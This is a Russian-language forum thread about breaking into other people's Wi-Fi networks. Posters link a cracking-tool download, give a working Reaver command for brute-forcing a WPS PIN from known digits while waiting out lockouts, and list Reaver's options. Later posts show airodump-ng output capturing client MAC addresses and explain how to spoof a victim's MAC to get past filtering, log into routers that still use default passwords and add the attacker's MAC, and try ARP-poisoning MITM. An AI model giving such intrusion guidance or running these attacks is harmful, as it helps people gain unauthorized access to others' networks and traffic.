http://satsat.info/attachments/wi-f...securityauditorprofessionaledition5_2_272.rar Я здесь брал, вроде работает.
есть первые 4 цифры от впс пинкода, точка лочит после 3 неправильных попытках на 5 мин., потом еще раз за неправильный пин на 10мин. как прописать в ривере опции чтоб начинал с первых известных 4 цифр и делал паузы на время лока точки? и чтоб можно было продолжить перебор с сохранением.
Необязательные аргументы: -m --mac=<mac> MAC хост-системы -e --essid=<ssid> ESSID целевой AP -c --channel=<channel> Установить 802,11 канал для интерфейса (следует -f) -o --out-file=<file> Запись вывода в лог-файл -s --session=<file> Восстановление предыдущей сессии -a --auto Автоматическое определение лучших дополнительных опций для целевой AP -f --fixed Отключение смены каналов -5 --5ghz Use 5GHz 802.11 channels -v --verbose Отображать некритические сообщения(-vv подробнее) -q --quiet Отображать только критические сообщения -h --help Показать помощь Расширенные опции: -p --pin=<wps pin> Использование 4 или 8 значного пин WPS -d --delay=<seconds> Установить задержку между попытками -l --lock-delay=<seconds> Установить время ожидания если АР блокируется -g --max-attempts=<num> Выход после Х попыток -x --fail-wait=<seconds> Установка времени для ухода в сон после 10 сбоев -t --timeout=<seconds> Установить тайм-аут ответа АР -T --m57-timeout=<seconds> Установить M5/M7 тайм-аут -A --no-associate Не ассоциироваться с АР -N --no-nacks Не отправлять сообщения NACK -S --dh-small Использовать небольшие ключи DH -L --ignore-locks Игнорировать блокировку целевой AP -E --eap-terminate Завершение каждой WPS сессии с EAP пакетами FAIL -n --nack Целевая AP всегда посылает NACK -w --win7 Mimic a Windows 7 registrar [False] Если вручную завершить сессию,она сохраняется автоматически.
Code: reaver -i mon0 -b 00:00:00:00:00:00 -c 11 -vv -p 1010 -d 65 -l 310 следующий раз стоит прописывать -p 1010 или ривер уже сам продолжит с этих 4 цифр?
Продолжит сам. Но при запуске он спросит, продолжать сессию или нет - надо согласиться, нажав Y. Если вы снова укажете этот параметр, он начнёт перебор второй части с нуля.
Существуют ли программы под винду, кроме платной Acrylic WI-FI PRO - которые показывают не просто доступные точки в радиусе, а и конкретно к каким из них подключены клиенты ? Поиск в инете результата не дал.
Вот у меня имеется вопрос - если я на роутере поставлю режим шифрования "нет" и в закладке "фильтрация по мас адресу" внесу значение только для моих устройств. Такая сеть будет считаться надежной от взлома по wifi (wifislax)
Теоретически и практически можно получить MAC адрес клиентов подключенных к AP(например через airodump-ng) - и ничего не мешает злоумышленнику поменять свой MAC-адрес на адрес жертвы, чтобы обойти защиту фильтрации...
Вот тут начинается самое интересное... Как будет вести себя злоумышленник если возможно поподробнее и список программ и команд
Если просто, тупо запускаю sudo airodump-ng wlan1mon и жду: Spoiler: Спойлер Code: CH 14 ][ Elapsed: 54 s ][ 2017-06-01 16:25 BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:00:00:00:00:00 -70 58 44 12 6 54e WPA2 CCMP PSK Masterskaya 00:00:00:00:00:00 -70 63 0 0 5 54e. WPA2 CCMP PSK TP-LINK_4 00:00:00:00:00:00 -72 75 0 0 6 54e WPA2 CCMP PSK leningrad1945 00:00:00:00:00:00 -74 31 2 0 6 54e. WPA2 CCMP PSK TP-Link 00:00:00:00:00:00 -76 53 0 0 2 54e. WPA2 CCMP PSK 15 00:00:00:00:00:00 -77 69 4 0 7 54e. WPA2 CCMP PSK sbm 00:00:00:00:00:00 -78 36 0 0 1 54e. WPA2 CCMP PSK 7ya 00:00:00:00:00:00 -80 15 0 0 4 54e. WPA2 CCMP PSK Ampera_second 00:00:00:00:00:00 -80 7 0 0 4 54e WPA2 CCMP MGT SilverFox 00:00:00:00:00:00 -81 28 0 0 2 54e. WPA2 CCMP PSK Super House 00:00:00:00:00:00 -82 3 0 0 4 54e WPA2 CCMP MGT SilverSamurai 00:00:00:00:00:00 -83 11 0 0 2 54e. WPA2 CCMP PSK TP-LINK_14 00:00:00:00:00:00 -83 31 0 0 10 54e. OPN cabinet13 00:00:00:00:00:00 -84 38 1 0 11 54e. WPA2 CCMP PSK Gods 00:00:00:00:00:00 -85 13 0 0 1 54e. WPA2 CCMP PSK AnnOlegovna 00:00:00:00:00:00 -85 10 0 0 9 54e. WPA2 CCMP PSK Ampera 00:00:00:00:00:00 -85 24 0 0 11 54e. WPA2 CCMP PSK Kaleria 00:00:00:00:00:00 -86 9 4 0 4 54e. WPA2 CCMP PSK mp_wireless 00:00:00:00:00:00 -87 7 45 0 1 54 WPA2 TKIP PSK banzai 00:00:00:00:00:00 -87 3 0 0 1 54e WPA2 CCMP MGT SilverFox 00:00:00:00:00:00 -88 3 0 0 1 54e WPA2 CCMP MGT SilverSurfer 00:00:00:00:00:00 -90 18 0 0 11 54e. WPA2 CCMP PSK disabled 00:00:00:00:00:00 -90 6 0 0 11 54e. WPA2 CCMP PSK .... 00:00:00:00:00:00 -80 3 0 0 4 54e WPA2 CCMP MGT SilverSurfer BSSID STATION PWR Rate Lost Frames Probe (not associated) 86:65:CA:D3:B3:43 -81 0 - 1 0 1 (not associated) C0:D3:C0:5F:C3:DB -84 0 - 1 0 2 helganetwork (not associated) A4:DB:30:98:76:CC -85 0 - 1 0 5 andrey (not associated) D0:22:BE:C7:B5:F2 -86 0 - 1 0 4 (not associated) C0:4A:00:A4:CA:1F -88 0 - 1 0 2 banzai (not associated) B8:5A:73:61:1B:04 -89 0 - 1 0 7 (not associated) CC:29:F5:2F:D4:F5 -89 0 - 1 0 1 TPXXX (not associated) 00:66:4B:5C:D6:FC -90 0 - 1 0 1 00:00:00:00:00:00 00:1F:3A:11:3C:55 -1 36e- 0 0 1 00:00:00:00:00:00 28:ED:6A:33:0F:6F -1 0e- 0 0 5 00:00:00:00:00:00 80:96:B1:81:D1:67 -72 0e- 1e 210 95 Masterskaya 00:00:00:00:00:00 B0:70:2D:32:73:CD -78 0 - 1 0 4 00:00:00:00:00:00 40:C6:2A:6C:85:29 -84 0 - 1 0 1 00:00:00:00:00:00 D8:5D:4C:99:B6:CA -90 0 - 1 0 1 00:00:00:00:00:00 64:9A:BE:48:1A:20 -1 1e- 0 0 11 00:00:00:00:00:00 84:89:AD:42:F2:CB -1 1 - 0 0 1 00:00:00:00:00:00 54:27:58:F6:3D:94 -86 5 - 1 0 66 где нижняя таблица STATION - и есть MAC адрес жертвы подключенной к BSSID, остальное дело фильтров...
Тут два варианта. Подключаешься, например ночью, когда не подключен пользователь и пользуешься. В идеале еще подключаешься к роутеру этого человека(при условии что пароли стандартные) и добавляешь в фильтрацию свой MAC-адрес.
Ну это тоже понятно. Вот только если как будет вести себя точка доступа если к ней захотят подключиться 2 клиента с одинаковым мас
На практике гораздо проще сломать сеть с простым пассом чем обходить блок по маку. Т.к. жертву ещё нужно караулить ....
Если в роутере MAC-клиента привязан IP, то тогда в случае если у человека Windows - может появится окошко конфликта IP адреса(но при условии повторного его получения или соединения кточке)
Всеравно если пользаватель соображает о фильтрации мас адресов, то полюбому для входа в роутер не оставит стандартные логин и пароль, тут злоумышленник не сможет войти в роутер, так ведь? Возможно ли взломаль логин и пароль роутера? Возможно ли взломаль логин и пароль роутера при условии 2 клиентов с одинаковым мас?
Если не перехватит пароль, когда одмин будет одминить свою прелесть. При таком раскладе будет сложно организовать MITM... так как отакующий сам будет попадать под ARP Poison. Хотя если прописать статично шлюз, может и прокатит.